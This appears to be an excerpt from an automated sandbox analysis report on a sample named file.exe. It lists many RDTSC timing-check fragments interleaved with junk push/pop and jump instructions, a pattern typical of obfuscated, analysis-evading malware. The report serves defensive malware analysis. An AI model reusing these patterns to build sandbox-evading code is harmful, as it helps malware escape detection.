Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3745 second address: DB374B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB374B second address: DB3755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3755 second address: DB3759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBBC46 second address: DBBC4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC03C second address: DBC040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC040 second address: DBC061 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF830E5CFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF830E5CFD3h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC191 second address: DBC1BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830ED6D49h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FF830ED6D3Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC306 second address: DBC311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF830E5CFC6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC311 second address: DBC316 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC316 second address: DBC31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC31C second address: DBC324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC324 second address: DBC32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC5D9 second address: DBC5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC5DF second address: DBC60D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF830E5CFCEh 0x0000000a pushad 0x0000000b jmp 00007FF830E5CFCAh 0x00000010 jmp 00007FF830E5CFCFh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D33 second address: DC3D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D37 second address: DC3D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF830E5CFD2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D51 second address: DC3D63 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF830ED6D36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D63 second address: DC3D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D69 second address: DC3D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D6D second address: DC3D7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FF830E5CFC6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3D7F second address: DC3D8B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF830ED6D36h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC415E second address: DC4168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF830E5CFC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4168 second address: DC416E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC416E second address: DC41A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FF830E5CFCCh 0x0000000c jnp 00007FF830E5CFC6h 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jmp 00007FF830E5CFD5h 0x0000001b push eax 0x0000001c push edx 0x0000001d jnc 00007FF830E5CFC6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC435A second address: DC436A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FF830ED6D36h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC436A second address: DC4381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFD3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC44CE second address: DC44DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF830ED6D36h 0x0000000a jc 00007FF830ED6D36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC44DE second address: DC44E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC44E2 second address: DC450D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF830ED6D3Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF830ED6D3Eh 0x00000012 jng 00007FF830ED6D36h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC450D second address: DC4511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC466A second address: DC467A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF830ED6D3Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC467A second address: DC46A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FF830E5CFC6h 0x00000009 jmp 00007FF830E5CFD9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC46A3 second address: DC46AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC46AD second address: DC46B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC46B6 second address: DC46C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF830ED6D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC46C0 second address: DC46E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF830E5CFD9h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC46E3 second address: DC46E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC547A second address: DC548B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF830E5CFCBh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC548B second address: DC549B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FF830ED6D3Eh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC327B second address: DC3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC3283 second address: DC329E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF830ED6D40h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDBD61 second address: DDBD67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB930 second address: DDB935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB935 second address: DDB941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF830E5CFC6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB941 second address: DDB945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDF6EC second address: DDF6F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDF6F1 second address: DDF70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jmp 00007FF830ED6D3Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDF70E second address: DDF716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDF148 second address: DDF152 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF830ED6D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE8ACD second address: DE8AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FF830E5CFD2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEE784 second address: DEE797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF830ED6D3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEE797 second address: DEE79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF18D3 second address: DF18F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FF830ED6D36h 0x0000000d jo 00007FF830ED6D36h 0x00000013 jmp 00007FF830ED6D3Bh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF18F2 second address: DF1900 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1900 second address: DF1904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1904 second address: DF1937 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF830E5CFD2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FF830E5CFD9h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1937 second address: DF193D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF193D second address: DF1941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF3D73 second address: DF3D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF3D82 second address: DF3D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF883C second address: DF8858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FF830ED6D42h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF89B1 second address: DF89B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF89B6 second address: DF89BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF89BC second address: DF89C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFAF57 second address: DFAF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFF5FF second address: DFF605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFF34C second address: DFF350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFF350 second address: DFF35D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B90E second address: E1B916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B916 second address: E1B92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF830E5CFCEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B92A second address: E1B931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B931 second address: E1B937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B5E2 second address: E1B5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B5E6 second address: E1B5ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B5ED second address: E1B60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF830ED6D42h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B60A second address: E1B613 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1B613 second address: E1B618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2A548 second address: E2A553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF830E5CFC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2AFC8 second address: E2AFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E15A second address: E2E15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E15E second address: E2E179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF830ED6D47h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E594 second address: E2E5AA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF830E5CFC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FF830E5CFC6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E5AA second address: E2E612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov dx, ax 0x0000000b push dword ptr [ebp+122D56ACh] 0x00000011 push ecx 0x00000012 xor edx, 43820847h 0x00000018 pop edx 0x00000019 call 00007FF830ED6D39h 0x0000001e jnc 00007FF830ED6D4Fh 0x00000024 push eax 0x00000025 push ebx 0x00000026 pushad 0x00000027 push edx 0x00000028 pop edx 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c pop ebx 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 push ecx 0x00000032 pushad 0x00000033 jmp 00007FF830ED6D46h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E612 second address: E2E633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FF830E5CFD7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E633 second address: E2E63D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF830ED6D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2F7E0 second address: E2F7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2F7E6 second address: E2F7FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830ED6D45h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E315B1 second address: E315DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FF830E5CFD1h 0x0000000e jmp 00007FF830E5CFD1h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E315DF second address: E315E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E315E5 second address: E3160C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF830E5CFC6h 0x00000008 jl 00007FF830E5CFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF830E5CFD5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F603BD second address: 4F603C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F603C3 second address: 4F603F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF830E5CFCBh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 mov si, F2F7h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F603F1 second address: 4F60400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60400 second address: 4F60404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60404 second address: 4F6040A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60472 second address: 4F60478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60478 second address: 4F6047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6047C second address: 4F604D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF830E5CFD6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov di, C744h 0x00000017 jmp 00007FF830E5CFCDh 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FF830E5CFCDh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F604D4 second address: 4F604F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov dx, F70Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF830ED6D40h 0x00000016 rdtsc
